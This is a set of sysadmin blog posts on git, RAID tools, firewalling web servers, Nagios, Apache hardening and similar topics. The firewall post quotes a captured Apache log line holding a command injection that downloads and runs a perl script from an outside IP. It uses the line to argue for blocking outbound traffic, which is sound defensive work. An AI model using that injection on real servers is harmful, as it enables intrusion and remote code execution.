Branches are cheap in git. This is how I use branches to release safely and iterate quickly

I commit a fix in a dev branch

$ git commit -v -m 'closes #101'
$ git branch
* dev
  master

I create a branch called dev-master which will be a new branch where I will do the actual merging of 2 branches. The parent of the dev-master branch will be the dev branch.

$ git checkout -b dev-master
Switched to a new branch "dev-master"
$ git branch
  dev
* dev-master
  master

I then merge master

$ git merge master

I change to the master branch and merge dev-master

$ git checkout master
Switched to branch "master"
$ git merge dev-master

Push to origin and clean up

$ git push origin master
$ git branch -d dev-master

If there is a conflict or if I need to back out of the merge I can do all the hard work in the dev-master branch without impacting any other branches.

I quickly needed to determine the status of a RAID array that sat on an IBM ServeRAID adapter. The boxen was running Ubuntu 9.04 x86_64, I didnt want to install RaidManager nor did I want to install a debian package. Here's how.

$ wget http://hwraid.le-vert.net/debian/pool-lenny/arcconf_6.10.18451-1_amd64.deb
$ ar -x arcconf_6.10.18451-1_amd64.deb
$ tar zxvf data.tar.gz
$ sudo ./usr/sbin/arcconf GETCONFIG 1

Install the debian package if you need.

For a majority of web servers out there the need to query DNS servers and make external HTTP connections are not required yet these types of outbound packets are generally not firewalled off.

Take a quick search through your Apache logs for the 'wget' command and you may find requests that resemble something like this

217.196.212.150 - - [09/Sep/2009:04:31:25 +1000] "GET /phpMyAdmin/config/config
.inc.php?c=cd%20/tmp;killall%20-9%20perl;rm%20-rf%20X0-lock;rm%20-rf%20font-nix
;wget%20193.13.87.38/X0-locker;perl%20X0-locker  HTTP/1.1" 404 230 "-" "Mozilla
/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

The above request shows a scripted HTTP query that attempts to pass several commands to the PHP file titled config.inc.php. If successful this command would of killed all perl processes owned by the user running the web server (the user being www-data and the web server being Apache in this case), rm'd a few files, downloaded a perl script called X0-locker from an external site and then ran that perl script with the privileges of www-data.

A catch all fix for these types of attacks is to firewall all packets generated by the user running Apache.

Below I will take this 1 step further and demonstrate how to successfully block all outbound connections that we do not allow through using Ubuntu. This includes outbound HTTP and DNS requests from our user running our web server. Whilst iptables is not Ubuntu specific, I use the ufw package which is found in Ubuntu. The iptables rules that I use can be bolted on top of most distributions if you change the chain names.

Firstly, lets install the ufw package

$ sudo apt-get install ufw

Set the default OUTPUT policy to DROP by editing /etc/default/ufw. This effectively drops every outgoing packet.

DEFAULT_OUTPUT_POLICY="DROP"

Enable ufw by setting ENABLED to yes by editing /etc/ufw/ufw.conf

ENABLED=yes

At this stage its best you ensure your remote console connection to your web server is working. If you dont have a remote console connection you can add a small cron job which will stop the ufw service removing all the iptables rules.

Add the following cron job to /etc/cron.d/ufw

*/10 * * * *    root /etc/init.d/ufw stop

ufw (version 0.27) has a --dry-run feature though as far I'm aware this does not work with editing rules in /etc/ufw/before.rules which is where we're going next. I cant stress enough that without a remote console connection or the above cron job, you most likely will lock yourself out of your server.

Now to begin editing iptables rules. Open /etc/ufw/before.rules and hash out the following lines

-A ufw-before-output -p tcp -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
-A ufw-before-output -p udp -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

Find the COMMIT line within /etc/ufw/before.rules which should be on the last line. Just before the COMMIT line add the following

# http/s
-A ufw-before-input -p tcp --sport 1024:65535 -m multiport --dports 80,443 
-j ACCEPT

# ssh
-A ufw-before-input -p tcp --dport 22 -j ACCEPT

# allow established packets through
-A ufw-before-output -p tcp -m state --state ESTABLISHED,RELATED -j ACCEPT
-A ufw-before-output -p udp -m state --state ESTABLISHED,RELATED -j ACCEPT

# ntp
-A ufw-before-output -m owner --uid-owner ntp -p udp -m multiport --dport 53,123 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
-A ufw-before-output -m owner --uid-owner root -p udp -m multiport --dport 53,123 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

# log
-A ufw-before-output -m limit --limit 3/min --limit-burst 10 -m state --state NEW -j LOG --log-uid

If you have a remote console connection to your server its best to login through it now. If not ensure the cron job that stops the ufw service is working. If one of these 'backdoors' are not working be prepared to pay a visit to your data center and login via the console.

Start ufw.

$ sudo /etc/init.d/ufw start

Check the new iptable rules are in place

$ sudo iptables -L -n -v

We can easily test that the rules are in place and are blocking outbound connections from the webserver by su'ing to the www-data user and generating an outbound DNS and HTTP request

$ sudo su - www-data -s /bin/bash
$ telnet www.google.com 80
telnet: could not resolve www.google.com/80: Name or service not known

As we havent allowed DNS requests to be made from the www-data user outbound, HTTP queries have no chance of getting through. You can relax this slightly by allowing DNS requests to be made by www-data. This may be required if your web applications do any host based outbound queries (eg; using the google maps API) or if your Apache configuration has host based ACLs using an authorization module such as mod_authz_host.

To allow DNS requests by the www-data but continue to block all outbound connections that are initiated by the www-data user add the following iptables rule just before the final ufw-before-output rule

-A ufw-before-output -m owner --uid-owner www-data -p tcp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
-A ufw-before-output -m owner --uid-owner www-data -p udp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

Logging

Within the rules that we have added to perform the logging of the packets that are blocked we've used the --log-uid option allowing the logs to contain the UID and GID of the user who generated the offending outbound packet.

This extra piece of information is incredibly useful in debugging web applications and services that are trying establish outbound connections

Nov 22 20:52:52 web01 kernel: [569936.655730] IN= OUT=eth0 SRC=10.3.2.70 
DST=66.249.89.99 LEN=60 TOS=0x10 PREC=0x00 TTL=64 ID=595 DF PROTO=TCP SPT=44742
DPT=80 WINDOW=5840 RES=0x00 SYN URGP=0 UID=33 GID=33 

From the above log we have the following important information that can help determine what was blocked and whether we need to unblock it.

OUT=eth0 - the ethernet card that the packet was route out
SRC=10.3.2.70 - the source IP address of your web server
DST=66.249.89.99 - the destination of the packet
PROTO=TCP - the protocol of the packet
DPT=80 - the destination port
UID=33 - the userid that generated the packet
GID=33 - the group id that generated the packet

I woke this morning after sleeping through Melbournes hottest November night ever to find a "Restore From iTunes" notification on my iPhone 3GS.

I go do what I'm told and attempt a restore in iTunes. "iPhone could not be restored. An unknown error occured (23)." error. Drats.

After spending 30 or so minutes checking out various forums, I tried a few so called "recovery" techniques though no cigar. I decided to give an Apple store a call to see what they could do and got slotted into an afternoon "appointment".

Sitting at the store in the Apple Genius Bar, amongst fanbois and shiny expensive things, the "genius" who I had an "appointment" with looked at the phone for 30 seconds, commented on the Android phone I had in my hand and then said "One minute mate, just going up stairs".

90 seconds later, I'm given a new replacement iPhone 16GB 3GS. No questions asked. No original receipt requested. No money required. 60 seconds after that I walk out the store as another happy customer.

Compare this to a previous experience I had with a large Australian Telco. The phone I had purchased was dropping calls so I went to one of their stores to see if they could help. 15 minutes of interrogation, proof of purchase required and 14 days later I received not a new replacement but the same phone with new "insides" without been given a phone I could use whilst my original phone was out being repaired.

Love them or hate them, Apple do things right by their customers. The simplicity they produce within the products has extended through to the way they treat and support their customers. Im more than a satisfied customer and will continue to purchase and use their products for a while yet.

Im finding the Nagios check_load check becoming slightly annoying and noisy during short bursts of high load on servers such as 4am when /etc/cron.daily jobs usually run. There are also other checks that I run where I dont care if they go into a WARNING state. Having too many alerts sent out can be detrimental to a server monitoring system as the poor person who gets the notifications will eventually consider Nagios crying wolf.

I need to know when servers hit a high load though I want to only be notified if its a sustained high load period. I also need to know when something is CRITICAL though dont really care if its in a WARNING state. If i did care if it was in a WARNING state then I would perhaps configure the check to use CRITICAL instead.

Anyhow, my Nagios configs below.

For a simple check load service check I set max_check_attempts which determines how many times Nagios will check the service if an error was to occur to a higher than usual value. If the check attempts reach the value of max_check_attempts and the service is still an error Nagios will change the service to a HARD state typically logging a CRITICAL alert. The default value of max_check_attempts is 5. Its also important to note that the duration between the checks is determined by retry_check_interval which defaults to 1 (minute).

In this example when the load average hits a sustained value of 8, Nagios will check the service 20 times every 1 minute. If the load is still at 8 or higher a CRITICAL alert will be sent.

define service {
        use                             generic-service
        hostgroup_name                  webservers
        service_description             check load
        check_command                   check_nrpe!check_load!5,5,5 8,8,8
        max_check_attempts              20
        notification_interval           0
}

To configure only CRITICAL alerts be sent to a contact I use the following contact configuration. The only real deviation from a standard configuration is service_notification_options which determines what levels (warning, critical, unknowns and recoveries). Ive removed w (warning) and u (unknown) as I only care for c (critical) and r (recovery) alerts.

define contact{
        contact_name                     rene
        alias                            Rene Cunningham
        service_notification_period      24x7
        host_notification_period         24x7
        service_notification_options     c,r
        host_notification_options        d,r
        service_notification_commands    notify-service-by-email
        host_notification_commands       notify-host-by-email
        email                            rene@rene.bz
        }

At LCA 2004 Andrew Tridgell gave an excellent presentation on his junkcode directory. A few snippets from the presentation

Most programmers write bits of junkcode at one time or another. It's an important part of learning to 
be a better programmer.
...
In this talk I hope to convince you to value your junkcode, and to keep it rather than deleting it 
when it has served its initial purpose. Today's junk can help you build tomorrows killer app.
...
Your junkcode directory forms a type of toolbox.
...
Instead of telling people “I once wrote a program that does that” I can say “here is a program that 
does that”. A great way to impress the boss!

You can download the entire presentation here.

Im sure many of the participants in the room who hadnt already created a ~/junkcode directory immediately found this talk extremely high value and busted open a shell running `mkdir ~/junkcode`. I know I did.

To this day i still use my ~/junkcode. Although I'm not as game as Andrew to publish it online Ive stuck it in a git repo which I pull and push from various machines.

Ive found it an invaluable part of my toolbox as a programmer and consider myself fortunate that I was able to attend a talk that certainly has provided me with a life long lesson.

If you havent already created a ~/junkcode directory, bust open that shell, run mkdir ~/junkcode and jump on the junkcode bus today!

After a quick way to import data from one table into another within MySQL?

I found this quick and dirty solution which solved a problem i thought would involve a bit more SQL than a single INSERT and SELECT.

INSERT INTO tableFoo.bar  
    SELECT * FROM tableFye.foe;

Probably one of the few cases where you should use SELECT * and not get laughed at by your friendly DBA

Im pretty sure ive been stung by OO.org bug #94033 or #101398 and it hurts. Both describe a significant time delay when opening certain document files with controls. I can reproduce the delay on Microsoft Word documents that include embedded objects.

Hopefully upgrading to OO.org 3.1 following this tutorial resolves the issue. Another suggestion is to downgrade to OO.org 2.41.

Until then, its abiword and friends.

After wrestling with Redhats Spacewalk Install Guide i was getting the following installation error.

* Deploying configuration files.
* Update configuration in database.
* Setting up Cobbler..
* Restarting services.
Tomcat failed to start properly or the installer ran out of tries. Please check /var/log/tomcat5/catalina.out for errors.
Installation complete.

/var/log/tomcat5/catalina.out had the following error

2009-05-15 16:15:12,206 [TP-Processor3] FATAL org.hibernate.connection.C3P0ConnectionProvider - JDBC Driver class not found: oracle.jdbc.driver.OracleDriver

Further investigation and several hair pulling moments i found that /var/lib/tomcat5/webapps/rhn/WEB-INF/lib/ojdbc14.jar was a dangling link. It links to /usr/share/java/ojdbc14.jar which then links to /usr/lib/oracle/10.2.0.4/client/lib/ojdbc14.jar which didnt exist for my install.

After fixing the dangly bit, linking it to an existing ojdbc14.jar file Spacewalk installs!

$ sudo rm /usr/share/java/ojdbc14.jar
$ sudo ln -sf /usr/lib/oracle/xe/app/oracle/product/10.2.0/server/jdbc/lib/ojdbc14.jar /usr/share/java/ojdbc14.jar

Cacti, the "complete network graphing solution", is a powerful web application that provides rrdtool graphing templates and data collection methods. Think web based system graphing and collection platform.

There is a small learning curve in creating advanced graphs, though once you flatten this curve you're able to harness the power of Cacti to do fancy things like graphing your motherboard temperature and fan RPM speeds.

Heres how

I picked up an G1 Android phone from Optus at lunch and here is my obligatory YAAR (Yet Another Android Review). Im not really much of a reviewer so ive hackishly whipped up positives and negatives ive found with the phone so far. I have no doubt that some of the negatives will be fixed in cupcake.

Googles Android G1 phone lands in AU tomorrow and will be sold to customers as the HTC Dream through Optus.

I had a quick play with a demo unit and my first thoughts are

* Its not as physically bulky as i thought it would be.
* Nearly twice a thick as an iPhone gen 1 and just a little bit longer in length.
* Android interface is fluid and smooth.
* Google maps street view blew me away.
* Physical keyboard is much better than soft keyboard on an iPhone
* Could be annoying for quick SMS's and emails as you will have to slide the G1 open.
* The 'chin' isnt too bad and it didnt take up too much 'pocket real estate'
* Real buttons will seem a bit strange to people who have used iPhones for a while

The Apple app store is certainly a disruptive market place which has changed the way mobile applications are developed and delivered. Apple has lowered the barrier to entry when it comes to creating mobile applications and though Apple will take 30% of your total sales, they will provide the sales, billing, distribution and development platforms. This has allowed developers to concentrate on what they love/do best, writing code without having to worry about marketing, distribution and setting up payment gateways.

But how much are iphone developers making?

Lab environments can get fairly messy if not maintained and the gentle hand of a sysadmin is routinely applied. Security compliance is generally the last thing on a developers mind whilst hacking away at projects still in the development stage. Having lab databases filled with unobfuscated customer data which is never a good idea, is unfortunately common.

Im not condoning having real customer data in a lab environment, though it does happen and there is a real potential for a disaster to occur such as testing out your latest 'mass email 2.0' code on your lab database not realising that your lab data is actually a production data set. Oh yer, you also forgot to firewall outbound port 25/tcp aswell as well as having recursion available within your internal BIND9 view. Doh!@#

Heck, having your lab have any access to the intertubes is just a plain bad idea.. period.

Techcrunch reported today that tshirthell.com is closing its doors.. for good. Tis a sad day for the interwebs when such an iconic 'free speech' sites decides to close its doors.

Oh well, it does look like Sunshine made enough coin to keep life interesting and has held out on selling the company for what probably would be a couple of million.

tshirthell.com owner, Sunshine Megatron, who gave away $25,000 on givemeaname.com to the person who came up with his new name, writes

I’m done. I’m finished. I can’t take the stupidity anymore, so I’m leaving and I’m taking my website with me. As of Tuesday, Feb 10, 2009, T-Shirt Hell will be no more.

No, I’m not selling out to some douchebag corporate entity. No, we’re not being sued by any of the over 40 companies that have sent us cease and desists over the years. No, I’m not going to jail (yet) and no, it’s not because of the economy. Although, the recent dip in sales certainly does make the idea easier to accept, even though we still sell over 3000 shirts a week.

I started this company in June of 2001, nearly 8 years ago, with the intention of producing the best satirical, the most controversial, the funniest t-shirts on the internet. Generally speaking, I feel I’ve accomplished that and am satisfied with what we’ve put out. I made a shitload of dough along the way. I’ve done cocaine off the better body parts of supermodels. I’ve even raped and killed a mountain panda in the hills of Shaanxi. But these perks are besides the point.

Read Sunshine's full letter here.

CEO's have the power to turn around entire companies making them some of the most influential people on the planet. Its always interesting to hear what they have to say about their companies, the products and services they offer and where they think the future is heading.

Bill Gates turned around Microsoft and outlined the Internets importantance with the internal memo titled Internal Tidal Wave. Louis Gerstner transformed IBM in the 90's from a hardware company to a highly focused, customer driven, services company. Both highly influential CEO's who saw opportunity and turned their companies around before it was too late.

Below are some interviews and speeches ive rounded up from youtube by some of the most powerful CEO's in the technology industry.

Steve Jobs - Apple - Wikipedia

Steve's Stanford commencement speech which he talks about life and how he started Apple and Pixar Animation.

Runing Apache though feeling a little bit insecure about how you've configured it, or perhaps how you've not configured it?

Some Linux vendors enable Apache features by default which can provide crackers and better insight into your system. Also insecure web applications could potentially allow crackers to execute system commands via Apache eventually allowing them to grab a shell on your server.

Here are 6 easy steps to quickly securing Apache.

Disable Apaches Server Signature and Server Tokens
Ever seen your web servers 404 page with something like the following in its footer?

Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 proxy_html/2.5 Server

From this, crackers are able to determine if your version of Apache, PHP, linux distribution or mod_proxy module are vulnerable to any known exploits. With 2 lines in your Apache conf, you can disable this banner.

ServerTokens Prod
ServerSignature Off

nuevasync allows iPhone users to sync their google contacts and calendars with their iPhones. It acts as an Microsoft Exchange server and with Apples enterprise iPhone support features it allows the iPhone to use nuevasync as an exchange server for google calendar and contacts.

It was a breeze to setup and after the 10 minutes it took for me to sign up and setup the exchange account within my iPhone, i had bi-directional syncing between the Google cloud and the iPhone.

Add the iPhones 'fetch' feature and you can get this sync to occur every 15 minutes.

There is no more need for iTunes to act as the conduit between 'googles cloud' and the iPhone. Huzzah.

The pam module pam_time.so will allow a system administrator to define what time users can access certain services.

To deny ssh logins for the user rene during business hours add the following to /etc/security/time.conf

ssh;*;rene;!Wk0900-1730

Then add the following line to /etc/pam.d/ssh

account    required     pam_time.so

Check out the time.conf(5) and pam_tally(8) man pages for some more examples of time.conf entries.

Interesting tid bits i found whilst investigating the above message in a kernel log.

• The first leap second was introduced in June 30, 1972 at 23:59:60.
• The decision to introduce a leap second and the announcement is officially made by the International Earth Rotation and Reference Systems Service body.
• The announcement by the IERS for the 31/12/2008 23:59:60 UTC leap second can be found here.
• A questionnaire has been raised within the IERS Gazette on whether the leap second should be abolished.
• The string 'Clock: inserting leap second' is found in kernel/time/ntp.c:143 of the 2.6.28 linux kernel.
• The unix localtime() function did not cater for the leap seconds. This was fixed by vendors who applied the Olson time libraries.